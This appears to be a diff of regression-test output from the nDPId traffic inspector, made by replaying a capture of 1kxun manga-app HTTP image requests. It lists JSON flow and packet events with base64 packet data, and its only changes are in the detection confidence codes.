01158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1654385146253,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":580,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":580,"pkt_l4_len":546,"thread_ts_msec":1654385146253,"pkt":"tKXvZygQnLbQ0+MzCABFAAI2XepAAEAGgL3AqAJ+DoiIbMDcAFBGVaTIJYHQDIAYAfZcQwAAAQEICh66VuKaCSE3R0VUIC9tYW5nYS1oYW50L2ltYWdlcy9wcm9qZWN0L2NhcnRvb25zL2FlYzAwYjFkYmRmNjc4ZWU4ZDJiODlkZjNmZGJkMDU5LmpwZyBIVFRQLzEuMQ0KSG9zdDogaGtibi5jb250ZW50LjFreHVuLmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiBpbWFnZS93ZWJwLGltYWdlL2FwbmcsaW1hZ2UvKiwqLyo7cT0wLjgNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146253,"flow_last_seen":1654385146253,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146253,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/aec00b1dbdf678ee8d2b89df3fdbd059.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146253,"flow_last_seen":1654385146253,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146253,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/aec00b1dbdf678ee8d2b89df3fdbd059.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146263,"flow_last_seen":1654385146263,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146263,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01159{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1654385146263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":580,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":580,"pkt_l4_len":546,"thread_ts_msec":1654385146263,"pkt":"tKXvZygQnLbQ0+MzCABFAAI2wylAAEAGG37AqAJ+DoiIbMDaAFBc\/ojalzQeJIAYAfZcQwAAAQEICh66VuyaCSFBR0VUIC9tYW5nYS1oYW50L2ltYWdlcy9wcm9qZWN0L2NhcnRvb25zL2IwNTdmNWNkOGZlMDEzZDIyOTliNTdmMTRmYWE1ZmE5LmpwZyBIVFRQLzEuMQ0KSG9zdDogaGtibi5jb250ZW50LjFreHVuLmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiBpbWFnZS93ZWJwLGltYWdlL2FwbmcsaW1hZ2UvKiwqLyo7cT0wLjgNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146263,"flow_last_seen":1654385146263,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146263,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/b057f5cd8fe013d2299b57f14faa5fa9.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146263,"flow_last_seen":1654385146263,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146263,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/b057f5cd8fe013d2299b57f14faa5fa9.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1833,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01158{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":580,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":580,"pkt_l4_len":546,"thread_ts_msec":1654385146276,"pkt":"tKXvZygQnLbQ0+MzCABFAAI2qplAAEAGNA7AqAJ+DoiIbMDkAFAiak7sb7SjVIAYAfZcQwAAAQEICh66VvqaCSFMR0VUIC9tYW5nYS1oYW50L2ltYWdlcy9wcm9qZWN0L2NhcnRvb25zL2YwNTA3NDI1NmIzOTU3MmFkODUyYzFjOTVlYjVmOGE3LmpwZyBIVFRQLzEuMQ0KSG9zdDogaGtibi5jb250ZW50LjFreHVuLmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiBpbWFnZS93ZWJwLGltYWdlL2FwbmcsaW1hZ2UvKiwqLyo7cT0wLjgNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1833,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/f05074256b39572ad852c1c95eb5f8a7.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01016{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1833,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49380,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/f05074256b39572ad852c1c95eb5f8a7.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01174{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":592,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":592,"pkt_l4_len":558,"thread_ts_msec":1654385146276,"pkt":"tKXvZygQnLbQ0+MzCABFAAJCh4dAAEAGVxTAqAJ+DoiIbMEEAFCZqr96liGslYAYAfZcTwAAAQEICh66VvqaCSFOR0VUIC9tYW5nYS1oYW50L2ltYWdlcy9wcm9qZWN0L2NhcnRvb25zLzEzYWViODFhNDdlNzYzMmNjZGYxYWVmZWUxOWVhNjVlLmpwZz9mb3JtYXQ9d2VicCBIVFRQLzEuMQ0KSG9zdDogaGtibi5jb250ZW50LjFreHVuLmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiBpbWFnZS93ZWJwLGltYWdlL2FwbmcsaW1hZ2UvKiwqLyo7cT0wLjgNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/13aeb81a47e7632ccdf1aefee19ea65e.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146276,"flow_last_seen":1654385146276,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146276,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49412,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/13aeb81a47e7632ccdf1aefee19ea65e.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146284,"flow_last_seen":1654385146284,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146284,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01174{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1654385146284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":592,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":592,"pkt_l4_len":558,"thread_ts_msec":1654385146284,"pkt":"tKXvZygQnLbQ0+MzCABFAAJCVPtAAEAGiaDAqAJ+DoiIbMD0AFBFStvgIItD4oAYAfZcTwAAAQEICh66VwKaCSFYR0VUIC9tYW5nYS1oYW50L2ltYWdlcy9wcm9qZWN0L2NhcnRvb25zLzAwZGQ2YmZlNzUwYzAyYzhkMTBkNzExMmQxNDNmMzIyLmpwZz9mb3JtYXQ9d2VicCBIVFRQLzEuMQ0KSG9zdDogaGtibi5jb250ZW50LjFreHVuLmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiBpbWFnZS93ZWJwLGltYWdlL2FwbmcsaW1hZ2UvKiwqLyo7cT0wLjgNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146284,"flow_last_seen":1654385146284,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146284,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49396,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/00dd6bfe750c02c8d10d7112d143f322.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385146284,"flow_last_seen":1654385146284,"flow_idle_time":7580000,"flow_min_l4_payload_len":526,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":526,"midstream":1,"thread_ts_msec":1654385146284,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"14.136.136.108","src_port":49396,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"hkbn.content.1kxun.com","url":"hkbn.content.1kxun.com\/manga-hant\/images\/project\/cartoons\/00dd6bfe750c02c8d10d7112d143f322.jpg?format=webp","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1836,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1654385146458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"thread_ts_msec":1654385146458,"pkt":"nLbQ0+MztKXvZygQCABFAAFR8fdAADYG95QOiIhswKgCfgBQwNwlgdAMRlWmyoAYAHrh2AAAAQEICpoJIgUeulbiSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjkuNy40DQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI1OjQ2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogNDU0MjYNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0yNTkyMDAwLCBtdXN0LXJldmFsaWRhdGUNCkV0YWc6IDhjZTAyMDA1YjJiYjVmYzc5Nzk1NTc1NmIwM2EzMTk2OTI2ZTc5OTYNCg0K"} 02413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1837,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1654385146460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385146460,"pkt":"nLbQ0+MztKXvZygQCABFAAXU8fhAADYG8xAOiIhswKgCfgBQwNwlgdEpRlWmyoAQAHoGUwAAAQEICpoJIgUeulbi\/9j\/4AAQSkZJRgABAQAAAQABAAD\/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL\/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL\/wgARCAI6AbIDASIAAhEBAxEB\/8QAGwAAAgMBAQEAAAAAAAAAAAAAAAMBAgQFBgf\/xAAaAQADAQEBAQAAAAAAAAAAAAAAAQIDBAUG\/9oADAMBAAIQAxAAAAH20E27BKcXAViJSJBAEhBIEEgQTAAAAASAAAAAAAAAEBIQABEwAAAAyCYGXpdICAoRFNwtkoAAADMSVVpqBeaXSmYkJglIAAAAAAAAiQIAAACQAAAAAAAImAAAgAABsACAAi1YGypYShsBVi2AAJAAJku6gAIJgVglBICAAAAAAAAAAgAAAcgCAAAAAAAAgAZEwAAwCBkTAAAXiRKCQIiasYAkAAq1B1ciQkiUiQCQBAAAAAABHBH348TWtPcnj9iXpIw7lmTAEkASEBIAEEBMEDkiQAGETA4JhhEwNkrvMyAKKMAraoOxAJQSXF5kmJICQBSRIAAAQArL5Z36Hy8UrVkpqnoEMlN24W0\/TdLxXUM\/QCrTncBkkCArYAAK2i4AAilwFgOiJhsYu6VgFIAAAFSQdLxISRIiJAgAYRIAAhDvOu+bnfmvalJnNLC0l73E50VemP06LGdLmaDHTMFRNYhVM0AZFAGXWwkAEABQtI6xcEsut0yVXSsQCkqAANzMSkAAABAAQEDkgDJx9ua+jJze9zsq519KVKk70Bo0q68vDsTtTZsyJvLSitdH1LZdyzXVoJJaiqSJCzU3aYRJESQEgABATS9BzathAAUtIAABS8BJEgAARMBWsVm2Cl5vi51ZuvXsZs6OeujmqhJl8+0EdHLzxdsy0Vb6VRS06eXq3XR3cdyXUbyHzPQSWUMtFiIrcCs1sOYkEEASRQL0IKm6wGi2EgAAAAABEgABEAmjO859smtLOd8Tgex8t2Oin66M1LXQ7fRjVuNtYGKurTNb+DdjWXdk6+tS1kiH00KJvS7yU9Kh7SkTM2rcABorMIraYHUuAuGwOrKWFIDQAERMBYACllywqK0VJ59Zipkq+V9Hy9aw9Hg9zdc\/cnWFc3cuLjdXXLha9EVOLVtTFchtdlbVcqHLWKq52JSM0rpWk1y2ZpjEtM5iQUQKG6c8g8iWgAAAKlqp2AaAEAAVVaYqqyiay9I3lWnm4Y35dF6Y85kG\/V1nZ7D7LaNvJ1IkmIlI9QzKHP6GbU7vlalCmMzFWOe51pbldoty\/PRz8nrZRY1dKm1Nc2rM3MQsvS9LjMCGpAAiRFCwnIQKaTWXF8T875PN9BzFzu6eZuWxOc59mY9nzek7Z5Pf62Xsehg6OO+jdzdTjUp81mi12p05QmtHQvzFHouj571riMHUiJ8L6LozpfMs6ueuO\/RRyZ6KL14WuSvTjpztX0XOhLRXuBkRMBJEgRMIAAirKjOb0M0JDVO4OpiNGYiZglr5mPwnXHtfEev5\/ZHFZW+uXa9X8899ydeyVsmk78yrO3l4TKizC12uvRaRl6VHrOVO5SOrWrSedn043vszp6EMqhvltiTjdHL3bZt\/bqW52up1zUUWiLAABEgAAAhvmonZbkXjLqP4PoODsrMmzeWjuyfhnx7fI9f4\/ezkJ9r5O4zd\/hQV73fxup5fdptTJtz8HteD9h1PoRJVM3YcBHpb5daxVj6VVVGHFaTqwdA6cet2ZnUwQ2Y5ufqomNbsuvTNkRZKbiE9FkXBgAokoFgAXz+qJebyeiwxlye4\/NehpQ96Oz05uW3ksvs\/"} 